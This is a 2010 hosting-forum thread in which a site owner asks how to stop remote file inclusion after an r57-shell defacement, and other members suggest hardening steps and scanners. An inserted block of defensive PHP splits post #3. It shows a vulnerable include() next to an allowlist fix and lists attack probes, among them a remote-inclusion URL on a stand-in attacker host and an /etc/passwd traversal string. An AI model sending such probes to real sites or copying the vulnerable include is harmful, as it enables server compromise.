#1
23rd June 2010, 23:29
bernholdt
Senior Member
 
Join Date: Jun 2007
Posts: 154
Thanks: 45
Thanked 13 Times in 11 Posts
Security question

Hi
I experienced a defacing today on one of my sites. Someone managed to get an r57 shell into my site.

I have mod_security2, PHP Suhosin and suPHP installed as security precautions.

What else can I do to protect myself against remote file inclusion?

I am running Debian Lenny with a Perfect Server setup from here.

Any hints or ideas?
__________________
www.gamebook.me

#2
24th June 2010, 09:37
topdog
Senior Member
 
Join Date: Jan 2008
Location: South Africa
Posts: 1,352
Thanks: 0
Thanked 153 Times in 150 Posts

A properly configured mod_security should be able to ward off most of those attacks; you could also investigate running PHP in safe mode. The issue with security is that it is a moving target. Keep scanning your applications for security vulnerabilities to keep ahead of the attackers.
__________________
----
http://www.topdog.za.net - Got Linux problems ? - I can help.
http://www.baruwa.org - Try it.
#3
24th June 2010, 19:32
bernholdt
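As an added illustration of the point made in this reply (this is example code, not something posted in the thread or shipped with the Perfect Server setup), here is the include() pattern that lets a request pull an r57-style shell over HTTP, next to a hardened version that maps the request parameter onto a fixed allowlist of local files. The page names, the pages/ directory and the open_basedir path are assumptions for the example.

```php
<?php
// Added example, not from the original thread.
// Assumptions: page scripts live in ./pages/ and the only ones that may ever
// be included are the (hypothetical) entries in ALLOWED_PAGES below.

// --- Vulnerable: the classic remote/local file inclusion bug -----------------
// With allow_url_include=On, a request such as
//   index.php?page=http://attacker.example/r57.txt?
// makes PHP fetch and execute the remote file as code. Even with URL includes
// disabled, "../" sequences still give local file inclusion of anything the
// web user can read.
function render_page_vulnerable(string $page): void
{
    include $page . '.php';   // the attacker controls the whole path
}

// --- Hardened: resolve untrusted input against an allowlist ------------------
const ALLOWED_PAGES = [
    'home'  => 'home.php',
    'about' => 'about.php',
    'news'  => 'news.php',
];

// Returns the absolute path to include, or null if the request is not a
// known page. The filename always comes from our own table, never from the
// request, so no URL, "../" or null byte can reach include().
function resolve_page(string $page): ?string
{
    if (!array_key_exists($page, ALLOWED_PAGES)) {
        return null;
    }
    return __DIR__ . '/pages/' . ALLOWED_PAGES[$page];
}

function render_page_safe(string $page): void
{
    $path = resolve_page($page);
    if ($path === null) {
        http_response_code(404);
        echo "Unknown page\n";
        return;
    }
    include $path;
}

// --- Defence in depth in php.ini (the php-cgi config used by suPHP) ---------
// allow_url_include = Off  ; include/require refuse http:// and ftp:// wrappers
// allow_url_fopen   = Off  ; unless the application genuinely needs remote fopen()
// display_errors    = Off  ; do not leak filesystem paths to an attacker
// open_basedir      = /var/www/example.com/web  ; assumed path; confines file access

// Demonstration with constructed probe values (run from the CLI):
//   php rfi_example.php
if (PHP_SAPI === 'cli') {
    $probes = [
        'home',                                 // legitimate request
        'http://attacker.example/r57.txt?',     // remote file inclusion attempt
        '../../../../etc/passwd',               // local file inclusion attempt
    ];
    foreach ($probes as $probe) {
        $resolved = resolve_page($probe);
        printf("%-36s => %s\n", $probe,
            $resolved === null ? 'rejected' : 'include ' . basename($resolved));
    }
}
```

The allowlist is the real fix: mod_security and Suhosin can block the obvious `?page=http://...` payloads, but only the application can decide which files are legitimate to include, and a lookup table makes that decision explicit instead of leaving it to whatever string the client sends.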
Senior Member
 
Join Date: Jun 2007
Posts: 154
Thanks: 45
Thanked 13 Times in 11 Posts

Hi Topdog

You write "Keep scanning your applications for security vulnerabilities to keep ahead of the attackers". Can you recommend a security scanner which I can use to find any holes in this particular script?
__________________
www.gamebook.me
#4
24th June 2010, 19:37
topdog
Senior Member
 
Join Date: Jan 2008
Location: South Africa
Posts: 1,352
Thanks: 0
Thanked 153 Times in 150 Posts

Scanning is not just about using automated tools, but good examples are http://www.cirt.net/nikto2 and Nessus with the commercial feed.

You need to subscribe to security vulnerability lists as well, and also do your own application auditing to check applications for XSS, CSRF and other kinds of web vulnerabilities.
__________________
----
http://www.topdog.za.net - Got Linux problems ? - I can help.
http://www.baruwa.org - Try it.
#5
25th June 2010, 09:57
Ben
Moderator
 
Join Date: Jul 2006
Posts: 1,029
Thanks: 7
Thanked 62 Times in 56 Posts

For application scanning you won't do that well using Nessus or Nikto, even though they can help you as a start.
It's like doing app pentests, where you have the choice of either some kind of black-box testing, with automated support (e.g. with Acunetix or similar; Acunetix is free for at least detecting XSS and crawling, and you could combine this with other free tools like Burp that can help to find more when letting Acunetix crawl through the page) plus manual testing, versus (manual / automated) code review. For PHP software you could try "RIPS". I did not use it yet, but the description sounded pretty interesting. sqlmap, for example, is interesting for checking SQL injections... You will find more tools when googling around for the above; OWASP or WebAppSec (and their mailing list archives) are a good resource pool as well.